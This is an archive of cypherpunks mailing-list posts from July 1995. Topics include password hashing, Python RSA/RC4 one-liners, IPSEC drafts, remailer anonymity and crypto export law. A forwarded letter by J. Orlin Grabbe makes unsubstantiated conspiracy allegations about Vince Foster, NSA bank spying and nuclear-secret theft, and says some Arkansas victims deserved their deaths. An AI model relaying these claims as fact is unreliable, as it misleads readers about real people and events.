standards for the Internet and World Wide Web, CCITT, ISO, ANSI, IEEE, and business, financial and electronic commerce networks around the globe. The Company develops and markets platform-independent developer's kits, end-user products, and provides comprehensive cryptographic consulting services. Founded in 1982 by the inventors of the RSA Public Key Cryptosystem, the company is headquartered in Redwood City, California. S/MIME Vendor Contacts: Connectsoft Tamese Robinson 206/450-9965 Frontier Dennis Freeman 414/241-4555 FTP Software Jill Dudka 508/659-6458 Qualcomm John Noerenberg 619/597-5103 Microsoft Tom Johnston 206/936-3233 Lotus Kevin Kosh 617/860-5632 Wollongong Bob Brodie 415/962-7203 Banyan Jay Seaton 508/898-1000 NCD Mike Harrigan 415/694-0663 SecureWare David Luther 404315-6295 VeriSign Web Augustine 415/508-1151 ### RSA Public Key Cryptosystem and PKCS are trademarks of RSA Data Security, Inc. All other product or company names are trademarks of their respective corporations. From carolab at censored.org Mon Jul 24 11:32:56 1995 From: carolab at censored.org (Censored Girls Anonymous) Date: Mon, 24 Jul 95 11:32:56 PDT Subject: Microsoft Stealing...IS....Re: MSN privacy In-Reply-To: Message-ID: I don't see why you call it what it really is. It is stealing. For if you reversed the process on Microsoft, as you had any contact with them, I'm sure that's what they'd call it. It no different that being seductive while you remove their wallet. Stealing yes, privacy no. Love Always, Carol Anne Member Internet Society - Certified BETSI Programmer - WWW Page Creation ------------------------------------------------------------------------- Carol Anne Braddock <--now running linux 1.0.9 for your pleasure carolann at censored.org __ __ ____ ___ ___ ____ carolab at primenet.com /__)/__) / / / / /_ /\ / /_ / carolb at spring.com / / \ / / / / /__ / \/ /___ / ------------------------------------------------------------------------- A great place to start My Cyber Doc... From jya at pipeline.com Mon Jul 24 11:54:53 1995 From: jya at pipeline.com (John Young) Date: Mon, 24 Jul 95 11:54:53 PDT Subject: NOD_off Message-ID: <199507241854.OAA01658@pipe6.nyc.pipeline.com> 7-24-95. NYPaper: "For I.B.M. Faithful, Questions About Windows 95." These are difficult days for OS/2 users."Every time I say I am an OS/2 user, I get immediately marginalized," an elderly woman confided to a young man sitting next to her at last week's OS/2 World convention in Boston. "It's amazing what saying you are an OS/2 user brings out in people." "You just have to explain that you are at the cutting edge of a powerful new technology," the young man advised her with a heavy dose of sarcasm. WRP_spd "Computer Pornography Hearing Will Not Include Expert Witness." The principal researcher in a computer pornography study will not testify at today's Senate hearing on children and computer pornography. Senator Charles E. Grassley, Republican of Iowa, removed the researcher, Marty Rimm, from the witness list late last week, after Carnegie Mellon University announced a formal investigation into whether Mr. Rimm and his faculty advisers had violated academic and ethical guidelines in preparing and publishing their study. WIT_les 1 +1: NOD_off From chrisg at chrisg.itg.ti.com Mon Jul 24 12:13:41 1995 From: chrisg at chrisg.itg.ti.com (Chris Gorsuch) Date: Mon, 24 Jul 95 12:13:41 PDT Subject: big dictionaries Message-ID: <199507241910.OAA00283@chrisg.itg.ti.com> Bill, Good point about using a "slow" hash algorithm. A "dictionary" attack on the hash should fail because, in order to currently use the password the old password had to not be in the dictionary in the first place. However "keyspace" attacks (brute force) would still be quite feasible. Would probably want to put something similiar to a salt in there to help increase the keyspace. Keep in mind that the only reason I suggested a hash at all is to prevent an admin who, in general, would not go through the effort to replace login/password or install a sniffer to get your password, but might be "unnecessarily" tempted by having easy to access passwords stored in plaintext on the server (still in a file only the admin could read). Basically just as a method to keep honest people honest. To verify that a user wasn't using a variation on the original, you would want to only store the hash of the original, but do hashes of the variants on the "new" password and compare with the stored hash of the old password. And of course, only store a password AFTER it has been changed. Really paranoid admins should use challenge/response/one-time passwords with/or kerberos. chris gorsuch chrisg at ti.com From sdw at lig.net Mon Jul 24 13:43:58 1995 From: sdw at lig.net (Stephen D. Williams) Date: Mon, 24 Jul 95 13:43:58 PDT Subject: Python export-a-cryptosystems Message-ID: I hadn't seen this on the list, so I'm forwarding it. (I may have skipped it in my 'catchup on a rainy day' mail archive.) A friend arranged a lunch today with Guido (the author of Python, Guido van Rossum ) and a few other friends. I haven't formed an opinion of Python yet. Notice that bc/dc isn't needed. ------- Forwarded Message Date: 06 Jul 1995 14:20:13 +0000 From: Andrew KUCHLING To: python-list at cwi.nl Subject: Re: Obfuscated Python Following modifications from Richard Jones and Guido van Rossum, we've now achieved a 4-line RSA script. (Shouldn't we all be doing some *real* work, I wonder? :) ) I've added a 2-line one-time pad program, which simply XORs the contents of the two files whose names are provided on the command line. Generation of random data (and securely exchanging it with your correspondent) is left as an exercise for the reader. So, the Python export-a-crypto-system-sigs are: Try: echo 'This is a test.' | rsa.py 10001 1967cb529 #!/usr/local/bin/python -- -export-a-crypto-system-sig -RSA-in-4-lines-Python from sys import*;from string import*;a=argv;[s,p,q]=filter(lambda x:x[:1]!= '-',a);d='-d'in a;e,n=atol(p,16),atol(q,16);l=(len(q)+1)/2;o,inb=l-d,l-1+d while s:s=stdin.read(inb);s and map(stdout.write,map(lambda i,b=pow(reduce( lambda x,y:(x<<8L)+y,map(ord,s)),e,n):chr(b>>8*i&255),range(o-1,-1,-1))) Try: echo 'This is a test.' | rc4.py messagekey #!/usr/local/bin/python -- -export-a-crypto-system-sig -RC4-in-4-lines-Python from sys import*;st,x,y,i2,k,s=range(256),0,0,0,map(ord,argv[1]*256)[:256],1 for i in st[:]:i2=(k[i]+st[i]+i2)%256;st[i],st[i2]=st[i2],st[i] while(s):s=stdin.read(1);x=(x+1)%256;y,c=(y+st[x])%256,len(s)and ord(s);( st[x],st[y])=st[y],st[x];stdout.write(chr(c^st[(st[x]+st[y])%256])[:len(s)]) Try: otp.py message pad >ciphertext #!/usr/local/bin/python -- -export-a-crypto-system-sig -OTP-in-2-lines-Python from sys import*;t=p=1;s,i,j=stdout,open(argv[1], 'r'),open(argv[2], 'r') while(t and p):t,p=i.read(1),j.read(1);t and p and s.write(chr(ord(t)^ord(p))) Andrew Kuchling andrewk at cst.ca fnord at cs.mcgill.ca (http://www.cs.mcgill.ca/~fnord) sdw -- Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw at lig.net http://www.lig.net/sdw Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011 OO/Unix/Comm/NN ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95 From usura at replay.com Mon Jul 24 14:12:17 1995 From: usura at replay.com (Alex de Joode) Date: Mon, 24 Jul 95 14:12:17 PDT Subject: Regulatory Arbitrage Server Message-ID: <199507242112.AA00932@xs1.xs4all.nl> Please check out: 'http://www.replay.com/exon', for the problems and suggestions about the scripts mail Adam Back for flames mail me. Have Fun! -- Alex de Joode Fear Uncertainty and Doubt, Inc. From perry at imsi.com Mon Jul 24 14:18:12 1995 From: perry at imsi.com (Perry E. Metzger) Date: Mon, 24 Jul 95 14:18:12 PDT Subject: IPSEC Message-ID: <9507242118.AA04814@webster.imsi.com> For those interested in reading up on the IPSEC work, check out ds.internic.net's "internet-drafts" directory. The following are the drafts that you will want to look at. draft-ietf-ipsec-ah-md5-03.txt draft-ietf-ipsec-arch-02.txt draft-ietf-ipsec-auth-02.txt draft-ietf-ipsec-esp-01.txt draft-ietf-ipsec-esp-des-cbc-04.txt draft-ietf-ipsec-photuris-02.txt I believe that the -ah-xx.txt draft is missing. Perry From anon-remailer at utopia.hacktic.nl Mon Jul 24 16:19:10 1995 From: anon-remailer at utopia.hacktic.nl (Anonymous) Date: Mon, 24 Jul 95 16:19:10 PDT Subject: An idea about Java and remailer clients and servers... Message-ID: <199507242313.BAA27191@utopia.hacktic.nl> Phil Fraering writes: > Why not "charge" for the ability to send an anonymous message with > the duty to have for a short time (maybe an hour or two) running > on your machine a node in a remailer network? User X on Machine A sends a form via HTTP (or a variant- SHTTP, HTTPS, etc.) to Machine B. User Y on Machine C receives an anonymous mail from Machine B. Suspecting User X, User Y sends a mail to be anonymized and sent back to himself to User X. User X's temporary remailer does as it's told. User Y now has a strong reason to suspect User X has sent the said mail. Cpunks write code and all, but I don't think this one's going to work. :-( From lmccarth at thor.cs.umass.edu Mon Jul 24 16:32:49 1995 From: lmccarth at thor.cs.umass.edu (L. McCarthy) Date: Mon, 24 Jul 95 16:32:49 PDT Subject: IPSEC In-Reply-To: <9507242118.AA04814@webster.imsi.com> Message-ID: <199507242332.TAA07652@thor.cs.umass.edu> Perry writes: > For those interested in reading up on the IPSEC work, check out > ds.internic.net's "internet-drafts" directory. Another place I found them is in ftp://ietf.cnri.reston.va.us/internet-drafts/ (ds.internic.net seems to be hosed today (!)) There's a brief summary of each IPSEC draft, with hyperlinks to the texts, at http://www.ietf.cnri.reston.va.us/ids.by.wg/ipsec.html From rjc at clark.net Mon Jul 24 16:49:41 1995 From: rjc at clark.net (Ray Cromwell) Date: Mon, 24 Jul 95 16:49:41 PDT Subject: An idea about Java and remailer clients and servers... In-Reply-To: <199507242313.BAA27191@utopia.hacktic.nl> Message-ID: <199507242349.TAA23120@clark.net> > > Phil Fraering writes: > > Why not "charge" for the ability to send an anonymous message with > > the duty to have for a short time (maybe an hour or two) running > > on your machine a node in a remailer network? > > User X on Machine A sends a form via HTTP (or a variant- SHTTP, HTTPS, etc.) > to Machine B. User Y on Machine C receives an anonymous mail from Machine > B. Suspecting User X, User Y sends a mail to be anonymized and sent back to > himself to User X. User X's temporary remailer does as it's told. User Y > now has a strong reason to suspect User X has sent the said mail. If the "duty" cycle is 1 hour and there are 10000 users utilizing the network, that tells you nothing. All it does it confirm that User X sent a remailer message within the last hour. One could just as easily finger User X and use the same reasoning. And if one has to suspect User X in the first place, User X has already blown his cover partially (either by writing style or other leaks) -Ray From rjc at clark.net Mon Jul 24 16:55:30 1995 From: rjc at clark.net (Ray Cromwell) Date: Mon, 24 Jul 95 16:55:30 PDT Subject: An idea about Java and remailer clients and servers... In-Reply-To: <199507242313.BAA27191@utopia.hacktic.nl> Message-ID: <199507242355.TAA26223@clark.net> > > Phil Fraering writes: > > Why not "charge" for the ability to send an anonymous message with > > the duty to have for a short time (maybe an hour or two) running > > on your machine a node in a remailer network? > > User X on Machine A sends a form via HTTP (or a variant- SHTTP, HTTPS, etc.) > to Machine B. User Y on Machine C receives an anonymous mail from Machine > B. Suspecting User X, User Y sends a mail to be anonymized and sent back to > himself to User X. User X's temporary remailer does as it's told. User Y I forgot to add. There is no reason User X has to run his remailer immediately. His software could simply commit to running a remailer for 1 hour at some specified future date < some threshold. Any messages sent to him for remailing would be queued until that time. Therefore, all your technique would tell you is that the user remailed a message sometime between date X and date Y. if Y-X > few days to week or two, the intelligence gathered on User X is miniscule. Traffic analysis would detect User X using the remailer network anyway. -Ray From cman at communities.com Mon Jul 24 17:55:50 1995 From: cman at communities.com (Douglas Barnes) Date: Mon, 24 Jul 95 17:55:50 PDT Subject: An idea about Java and remailer clients and servers... Message-ID: > I forgot to add. There is no reason User X has to run his remailer >immediately. His software could simply commit to running a remailer for >1 hour at some specified future date < some threshold. Any messages >sent to him for remailing would be queued until that time. Therefore, >all your technique would tell you is that the user remailed a message >sometime between date X and date Y. if Y-X > few days to week or two, >the intelligence gathered on User X is miniscule. Traffic analysis would >detect User X using the remailer network anyway. > When I've thought about this, it's been from the p.o.v. of message senders being able to earn prepaid service tokens (not unlike digital cash) for offering their machine as a remailer for a set period of time or number of message or total bandwidth or whatever. This activity could be completely asynchronous to any origination of messages, and, in fact, a regular habit of accumulating tokens like this would make for excellent cover traffic. From pgf at tyrell.net Mon Jul 24 18:18:15 1995 From: pgf at tyrell.net (Phil Fraering) Date: Mon, 24 Jul 95 18:18:15 PDT Subject: An idea about Java and remailer clients and servers... In-Reply-To: <199507242313.BAA27191@utopia.hacktic.nl> Message-ID: <199507250113.AA24873@tyrell.net> Anonymous writes, concerning the "you want a remailer, you run one" idea: User X on Machine A sends a form via HTTP (or a variant- SHTTP, HTTPS, etc.) to Machine B. User Y on Machine C receives an anonymous mail from Machine B. Suspecting User X, User Y sends a mail to be anonymized and sent back to himself to User X. User X's temporary remailer does as it's told. User Y now has a strong reason to suspect User X has sent the said mail. Cpunks write code and all, but I don't think this one's going to work. :-( I was thinking in terms of User X running one node in a mixmaster network. AFAIK, mixmaster doesn't work in one-bounce mode; otherwise, why would it go through all the trouble of breaking up the messages, etc.? Phil From wb8foz at nrk.com Mon Jul 24 18:21:06 1995 From: wb8foz at nrk.com (David Lesher) Date: Mon, 24 Jul 95 18:21:06 PDT Subject: Exporting from Canada (was Re: Let's try breaking an SSL RC4 key) In-Reply-To: <199507241415.KAA26817@wink.io.org> Message-ID: marc: > However, goods of U.S. origin are export restricted, unless said > goods are further processed outside the U.S. so as to result in a > substantial change in value, so some of the PGP development would > need to be done in Canada. How about compiling it? THAT is "further processing"...... -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close........[v].(301) 56-LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead....................................20915-1433 From lmccarth at thor.cs.umass.edu Mon Jul 24 18:45:44 1995 From: lmccarth at thor.cs.umass.edu (L. McCarthy) Date: Mon, 24 Jul 95 18:45:44 PDT Subject: An idea about Java and remailer clients and servers... In-Reply-To: <199507250113.AA24873@tyrell.net> Message-ID: <199507250145.VAA08413@thor.cs.umass.edu> Phil Fraering writes: > I was thinking in terms of User X running one node in a mixmaster > network. AFAIK, mixmaster doesn't work in one-bounce mode; The sender can ask the client to set the number of hops as low as 1, if she/it/he so desires. I think Doug Barnes has suggested the best protocol for handling "co-op remailing" ;) -Futplex From jed at blaze.cs.jhu.edu Mon Jul 24 19:00:07 1995 From: jed at blaze.cs.jhu.edu (Jeremy Rauch) Date: Mon, 24 Jul 95 19:00:07 PDT Subject: Exporting from Canada (was Re: Let's try breaking an SSL RC4 key) In-Reply-To: Message-ID: <3v1j6h$fge@blaze.cs.jhu.edu> David Lesher (wb8foz at nrk.com) wrote: : marc: : > However, goods of U.S. origin are export restricted, unless said : > goods are further processed outside the U.S. so as to result in a : > substantial change in value, so some of the PGP development would : > need to be done in Canada. : How about compiling it? THAT is "further processing"...... Perhaps...but I for one wouldn't trust anyone else to compile my copy of PGP...would you? And, note, it says sustantial change in value...I don't know if this is taken to mean monetary, or usability...the later might work. It's an interesting idea. Jeremy : -- : A host is a host from coast to coast.................wb8foz at nrk.com : & no one will talk to a host that's close........[v].(301) 56-LINUX : Unless the host (that isn't close).........................pob 1433 : is busy, hung or dead....................................20915-1433 -- ____________________________________________________________________________ | Jeremy Rauch .--~~,__ | | | :-....,-------`~~'._.' | jed at cs.jhu.edu | | `-,,, ,_ ;'~U' | alhambra at jhu.edu | | Johns Hopkins _,-' ,'`-__; '--. | jed at jhunix.hcf.jhu.edu | | University (_/'~~ ''''(; | http://server.cs.jhu.edu/~jed | |______________________________________|_____________________________________| Finger for PGP key Member, *the Guild The light that burns twice as bright burns half as long From bdolan at use.usit.net Mon Jul 24 20:55:27 1995 From: bdolan at use.usit.net (Brad Dolan) Date: Mon, 24 Jul 95 20:55:27 PDT Subject: Part IX: Allegations re Vince Foster, the NSA, and Bank Spying (fwd) Message-ID: ---------- Forwarded message ---------- Date: Mon, 24 Jul 1995 23:11:45 -0400 (EDT) From: KALLISTE at delphi.com Subject: Part IX: Allegations re Vince Foster, the NSA, and Bank Spying -----BEGIN PGP SIGNED MESSAGE----- Allegations Regarding Vince Foster, the NSA, and Banking Transaction Spying, Part IX by J. Orlin Grabbe July 23, 1995 Gregory Wierzynski Assistant Staff Director U.S. House of Representatives Committee on Banking and Financial Services 2129 Rayburn Building Washington, D.C. 20515 202-225-7502 Dear Mr. Wierzynski: Thank you for email letter, a copy of which is attached. I am not sure why you think my quoting selections from Mr. Jim Norman necessarily implies endorsement or acceptance of them on my part. I have, of course, quoted many, many selections from Mr. Norman, so perhaps you could be more specific with respect to the ones you are concerned about. Perhaps I could be of assistance to your inquiries among the spooks, if only you could describe to me which points you have investigated, and how you have investigated them. I certainly wouldn't want to promote anything that, as you say, "flied in the face of facts." On the other hand, I am greatly concerned about the use by Alltel Information Services (formerly Systematics) of a libel attorney, Charles O. Morgan, in an attempt to intimidate journalists and destroy the First Amendment to the U.S. Constitution. And I am also gravely concerned about the possible leak of U.S. codes and nuclear secrets to a foreign power, which is an issue of *real* national security concern to the U.S. (Of course you and I both know that "national security" is often used to hide the truth about sell-outs of national security from the American people, by clamping a lid on the discussion or reporting of things that are common knowledge among U.S. military and security agencies, and even common knowledge to the general public of the foreign power to which these secrets have been compromised.) Before reading my email, and your letter, I sent you a copy of "Part VIII: Allegations Regarding Vince Foster, the NSA, and Banking Transactions Spying". There you will see from the quotes that the theft of U.S. nuclear secrets by Israel is openly discussed in Israeli newspapers, so I am sure that this is not one of the "off-the-wall" issues to which you are referring. (With respect to that issue, I suggest that you do some investigation in Tel Aviv.) With respect to money laundering I am not concerned, for reasons I have indicated in my essay "The End of Ordinary of Money", Parts I and II, a copy of which I previously provided the Committee. The money-laundering laws ought to be abolished, but in the meantime I do find the selective enforcement of these laws troubling. With respect to "Chuck in Kentucky", I know more than one Chuck in Kentucky, so perhaps you could be more specific which Chuck you refer to. What stories did he tell you, and how is it that they didn't pan out? Since you have already spoken to both Jim and Chuck, I am taking the liberty of sending a copy of this letter (and your letter) to Jim Norman, and to one possible Chuck you may be referring to, so that perhaps they can explain to me their failing to satisfy you as to the accuracy of their information. Now, Mr. Wierzynski, I would like to bring up an issue about your Committee's behavior that is troubling me. I am sure that there is an innocent explanation that I am missing. You will recall the meeting that I had with you and Mr. Stephen Ganis, the Counsel to the Committee, at the Four Seasons in Georgetown on Monday, June 12, 1995. Two days previously I had been playing volleyball in the Mall with Dana Rohrbacher and Jack Wheeler and some others, and I had pulled most of the muscles in my right ankle. So I asked everyone I was meeting to come over to the hotel, and you and Mr. Ganis graciously consented. We met in the Four Seasons lounge, where I was the only person not wearing shoes. You told me that, more than money laundering in Mena, Arkansas, you were interested as to whether there were any documents connecting Vince Foster to Systematics, or whether I knew the name of any Systematics programmers that may have worked to modify the PROMIS software to spy on banking transactions. I told you I couldn't recall seeing any such documents, and that I had come across the name of one programmer, but I had subsequently forgotten it. It was a pleasant meeting, so to be helpful I gave you a copy of Jim Norman's *Fostergate* that had been spiked from *Forbes*. "Why would Steve Forbes kill the article?" you asked. I said I didn't know, but that--since you appeared to know Steve Forbes--you should call him yourself. Now, much to my surprise, I find that the following happened: Just as *Media Bypass* was about to run Jim Norman's article *Fostergate*, they received a letter from Charles O. Morgan, indicating grave consequences if they were so foolish as to print the article. Mr. Morgan claimed to know what was in the article, because, he said, he had received a copy from Mr. Stephen Ganis of your Committee! I am bothered by the fact that while you alleged to me you were investigating Systematics that at the same time you are passing along information to Systematics. I am sure there is an innocent explanation. But consider this: what if I had given you Foster-related documents and the names of Systematics programmers? Would these have been passed along to Mr. Morgan also? As you know, a number of people connected to this whole business have died violent deaths in Arkansas. (Of course, I understand some of them had already been paid off to keep their mouths shut, and didn't, and so--under any standard of morality--deserved what they got.) Well, things are never what they appear, so perhaps you can clear things up for me. Please pass along my concern to Mr. Ganis, and tell him I will be glad to sit down with him and have a drink, or share a line, and have a frank discussion about this issue. (I have nothing against the use of any drug, if used in moderation, and in the appropriate context.) Regards, Orlin Attachment: Your letter to me - --------------------------------------------------------------------- From: IN%"gregorw at netcom.com" 23-JUL-1995 19:53:52.82 To: IN%"KALLISTE at delphi.com" CC: Subj: RE: Part VII Return-path: Received: from netcom13.netcom.com by delphi.com (PMDF V4.3-9 #10880) id <01HT7ZLMQQTC9VUSVZ at delphi.com>; Sun, 23 Jul 1995 19:53:50 -0400 (EDT) Received: by netcom13.netcom.com (8.6.12/Netcom) id QAA03469; Sun, 23 Jul 1995 16:51:04 -0700 Date: Sun, 23 Jul 1995 16:51:04 -0700 From: gregorw at netcom.com (Gregory Wierzynski) Subject: Re: Part VII To: KALLISTE at delphi.com Message-id: <199507232351.QAA03469 at netcom13.netcom.com> Content-transfer-encoding: 7BIT Orlin -- We're reading your stuff with interest. Thank you for including me in your list of recipients; I pass the material on to my boss and my colleagues on the Committee. I am somewhat surprised, however, that you accept the Norman piece without raising any questions about its sources. We've talked to Jim and tried to check out the sources he thought he could share with us. We have also done a fair amount of investigating on our own using the resources available to us--by which I mean officials inquiries to the spooks. So far we draw a complete blank. Worse, the preponderance of the evidence suggests that Jim's piece is pretty much off-the-wall. Worse still, it appears to fly in the face not just of facts, but simple logic as well. I haven't, by any means, given up on this subject, but pursuing a trail grown cold is difficult to justify when you're paid by the taxpayer. Do you have suggestions on how we could verify some of the elements in the Norman story? I've talked to Chuck in Kentucky and am still in touch with him. But his stories have not panned out, even partially. I would be most interested in your ideas. Best regards. Greg - - -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMBP21mX1Kn9BepeVAQGP3AP9Hm/kwmUuz9kNH+q9D728Xe6rdHHPjpT8 bAxwzIK9UsJsIF5oLfjTVWovEtGBj3QvJlmFY7hkVFZAYpx6q4R65NUX/ZpHtKaF QDugRJZJUxKRaD+9CYepFFt6+ZTK8pQr+me3CgY1ZBVbdNZL4LE9rLFA1Z4XD/vL csNGnDpuTq0= =t4hx -----END PGP SIGNATURE----- From system at decode.com Mon Jul 24 21:12:36 1995 From: system at decode.com (Dan Veeneman) Date: Mon, 24 Jul 95 21:12:36 PDT Subject: Anyone going to DEFCON Message-ID: QLDM75A at prodigy.com (MR ELDON B JENKINS) writes: > I don't know if anyone else from this list is going but I will be > there for the whole conference and wouldn't mind meeting up with some > of the people from this list. [...] I am also planning on attending DefCon, and would be interested in meeting up with some Cypherpunks. > Eldon Jenkins Dan -- system at decode.com (Dan Veeneman) Cryptography, Security, Privacy BBS +1 410 730 6734 Data/FAX From nzook at bga.com Mon Jul 24 21:18:22 1995 From: nzook at bga.com (Nathan Zook) Date: Mon, 24 Jul 95 21:18:22 PDT Subject: Crisis Overload (re Electronic Racketeering) In-Reply-To: Message-ID: On Thu, 13 Jul 1995, Sandy Sandfort wrote: > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > SANDY SANDFORT > . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . > > C'punks, > > On Thu, 13 Jul 1995, Perry E. Metzger wrote: > > > As unpleasant as the congress is, it isn't the enemy. The governmental > > forces desiring control are not the same as the congress. > > I'm not so sure. Both politicos and bureaucrats go into their > respective lines of work for many reasons. One of the main > reasons--in my opinion--is a lust to control others. Being the > "others," we should resist this tendancy. This begins with the > realization that most of them *are* the enemy and acting > accordingly. > Well, now, I wouldn't say THAT.... There are those of us intent enough of defending our rights as to go so far as to make an effort of getting to where we can do so more easily. While I know I was shouted down over NYET, the group does know where I stand on the issue of, for instance, free crypto or the Exon Hustler Protection Act. I intend to run for JP in '98, and (assuming our electoral system, if not our Constition is still intact) higher office later. If I win, you can bet your keyring passwords that _I_ will make sure that my juries are aware of FIJAs position papers. There are others--including one John Tello, a member of the Texas State Republican Executive Committee, who almost single handedly got a unanimous resolution out of the TX SREC calling for an end of our 60-year emergency and a recision of various related acts. Bluntly, if you are bellyaching but _not_ involved with an organized political structure that is capable of influencing legislation, then I blame YOU for this legislation. I am, have, and/or shall have lobbied every Congressman with whom I can claim a minimal connection. And I've done the work so that this is a non-trivial list. Direct mail is useful. But until you've worked to get someone elected, you are just one more voice in the roar. The '96 campaigns are shaping up. (I'm already putting the word out for '98...) This is the time to find people who share our views, and work so that they win their primaries--or maybe don't even have to fight one. Or maybe its time _you_ ran. Nathan Crypto-Christo-punk From mnorton at cavern.uark.edu Mon Jul 24 21:26:27 1995 From: mnorton at cavern.uark.edu (Mac Norton) Date: Mon, 24 Jul 95 21:26:27 PDT Subject: Part IX: Allegations re Vince Foster, the NSA, and Bank Spying (fwd) In-Reply-To: Message-ID: Okay, thing is, I read all of the below, and it seems like the guy's trying hard to tell you that he'd bend over backward to make this case, even to the extent of associating with fringebinges like you, but your stuff keeps coming up fulla, um, thin air. Huh? MacN On Mon, 24 Jul 1995, Brad Dolan wrote: > > > ---------- Forwarded message ---------- > Date: Mon, 24 Jul 1995 23:11:45 -0400 (EDT) > From: KALLISTE at delphi.com > Subject: Part IX: Allegations re Vince Foster, the NSA, and Bank Spying > > -----BEGIN PGP SIGNED MESSAGE----- > > Allegations Regarding Vince Foster, the NSA, and > Banking Transaction Spying, Part IX > > by J. Orlin Grabbe > > > July 23, 1995 > > Gregory Wierzynski > Assistant Staff Director > U.S. House of Representatives > Committee on Banking and Financial Services > 2129 Rayburn Building > Washington, D.C. 20515 > 202-225-7502 > > Dear Mr. Wierzynski: > > Thank you for email letter, a copy of which is attached. > > I am not sure why you think my quoting selections from Mr. Jim Norman > necessarily implies endorsement or acceptance of them on my part. I have, > of course, quoted many, many selections from Mr. Norman, so perhaps you > could be more specific with respect to the ones you are concerned about. > > Perhaps I could be of assistance to your inquiries among the spooks, if > only you could describe to me which points you have investigated, and how > you have investigated them. I certainly wouldn't want to promote anything > that, as you say, "flied in the face of facts." > > On the other hand, I am greatly concerned about the use by Alltel > Information Services (formerly Systematics) of a libel attorney, > Charles O. Morgan, in an attempt to intimidate journalists and destroy > the First Amendment to the U.S. Constitution. > > And I am also gravely concerned about the possible leak of U.S. codes > and nuclear secrets to a foreign power, which is an issue of *real* > national security concern to the U.S. (Of course you and I both know > that "national security" is often used to hide the truth about sell-outs > of national security from the American people, by clamping a lid on > the discussion or reporting of things that are common knowledge among > U.S. military and security agencies, and even common knowledge to the > general public of the foreign power to which these secrets have been > compromised.) > > Before reading my email, and your letter, I sent you a copy of "Part VIII: > Allegations Regarding Vince Foster, the NSA, and Banking Transactions > Spying". There you will see from the quotes that the theft of U.S. > nuclear secrets by Israel is openly discussed in Israeli newspapers, so > I am sure that this is not one of the "off-the-wall" issues to which > you are referring. (With respect to that issue, I suggest that you do > some investigation in Tel Aviv.) > > With respect to money laundering I am not concerned, for reasons I have > indicated in my essay "The End of Ordinary of Money", Parts I and II, > a copy of which I previously provided the Committee. The money-laundering > laws ought to be abolished, but in the meantime I do find the selective > enforcement of these laws troubling. > > With respect to "Chuck in Kentucky", I know more than one Chuck in Kentucky, > so perhaps you could be more specific which Chuck you refer to. What stories > did he tell you, and how is it that they didn't pan out? > > Since you have already spoken to both Jim and Chuck, I am taking the liberty > of sending a copy of this letter (and your letter) to Jim Norman, and to one > possible Chuck you may be referring to, so that perhaps they can explain to > me their failing to satisfy you as to the accuracy of their information. > > Now, Mr. Wierzynski, I would like to bring up an issue about your Committee's > behavior that is troubling me. I am sure that there is an innocent > explanation that I am missing. You will recall the meeting that I had with > you and Mr. Stephen Ganis, the Counsel to the Committee, at the Four Seasons > in Georgetown on Monday, June 12, 1995. Two days previously I had been > playing volleyball in the Mall with Dana Rohrbacher and Jack Wheeler and some > others, and I had pulled most of the muscles in my right ankle. So I > asked everyone I was meeting to come over to the hotel, and you and Mr. Ganis > graciously consented. We met in the Four Seasons lounge, where I was the > only person not wearing shoes. > > You told me that, more than money laundering in Mena, Arkansas, you were > interested as to whether there were any documents connecting Vince Foster > to Systematics, or whether I knew the name of any Systematics programmers > that may have worked to modify the PROMIS software to spy on banking > transactions. I told you I couldn't recall seeing any such documents, and > that I had come across the name of one programmer, but I had subsequently > forgotten it. It was a pleasant meeting, so to be helpful I gave you a > copy of Jim Norman's *Fostergate* that had been spiked from *Forbes*. > "Why would Steve Forbes kill the article?" you asked. I said I didn't > know, but that--since you appeared to know Steve Forbes--you should call > him yourself. > > Now, much to my surprise, I find that the following happened: Just as > *Media Bypass* was about to run Jim Norman's article *Fostergate*, they > received a letter from Charles O. Morgan, indicating grave consequences > if they were so foolish as to print the article. Mr. Morgan claimed to know > what was in the article, because, he said, he had received a copy from Mr. > Stephen Ganis of your Committee! > > I am bothered by the fact that while you alleged to me you were investigating > Systematics that at the same time you are passing along information to > Systematics. I am sure there is an innocent explanation. But consider this: > what if I had given you Foster-related documents and the names of Systematics > programmers? Would these have been passed along to Mr. Morgan also? As you > know, a number of people connected to this whole business have died violent > deaths in Arkansas. (Of course, I understand some of them had already been > paid off to keep their mouths shut, and didn't, and so--under any standard of > morality--deserved what they got.) > > Well, things are never what they appear, so perhaps you can clear things up > for me. Please pass along my concern to Mr. Ganis, and tell him I will be > glad to sit down with him and have a drink, or share a line, and have a frank > discussion about this issue. (I have nothing against the use of any drug, if > used in moderation, and in the appropriate context.) > > Regards, > Orlin > > Attachment: Your letter to me > - --------------------------------------------------------------------- > > From: IN%"gregorw at netcom.com" 23-JUL-1995 19:53:52.82 > To: IN%"KALLISTE at delphi.com" > CC: > Subj: RE: Part VII > > Return-path: > Received: from netcom13.netcom.com by delphi.com (PMDF V4.3-9 #10880) > id <01HT7ZLMQQTC9VUSVZ at delphi.com>; Sun, 23 Jul 1995 19:53:50 -0400 (EDT) > Received: by netcom13.netcom.com (8.6.12/Netcom) id QAA03469; Sun, > 23 Jul 1995 16:51:04 -0700 > Date: Sun, 23 Jul 1995 16:51:04 -0700 > From: gregorw at netcom.com (Gregory Wierzynski) > Subject: Re: Part VII > To: KALLISTE at delphi.com > Message-id: <199507232351.QAA03469 at netcom13.netcom.com> > Content-transfer-encoding: 7BIT > > Orlin -- > > We're reading your stuff with interest. Thank you for including me in your > list of recipients; I pass the material on to my boss and my colleagues on > the Committee. > > I am somewhat surprised, however, that you accept the Norman piece without > raising any questions about its sources. We've talked to Jim and tried to > check out the sources he thought he could share with us. We have also done > a fair amount of investigating on our own using the resources available to > us--by which I mean officials inquiries to the spooks. So far we draw a > complete blank. Worse, the preponderance of the evidence suggests that > Jim's piece is pretty much off-the-wall. Worse still, it appears to fly in > the face not just of facts, but simple logic as well. > > I haven't, by any means, given up on this subject, but pursuing a trail > grown cold is difficult to justify when you're paid by the taxpayer. > > Do you have suggestions on how we could verify some of the elements 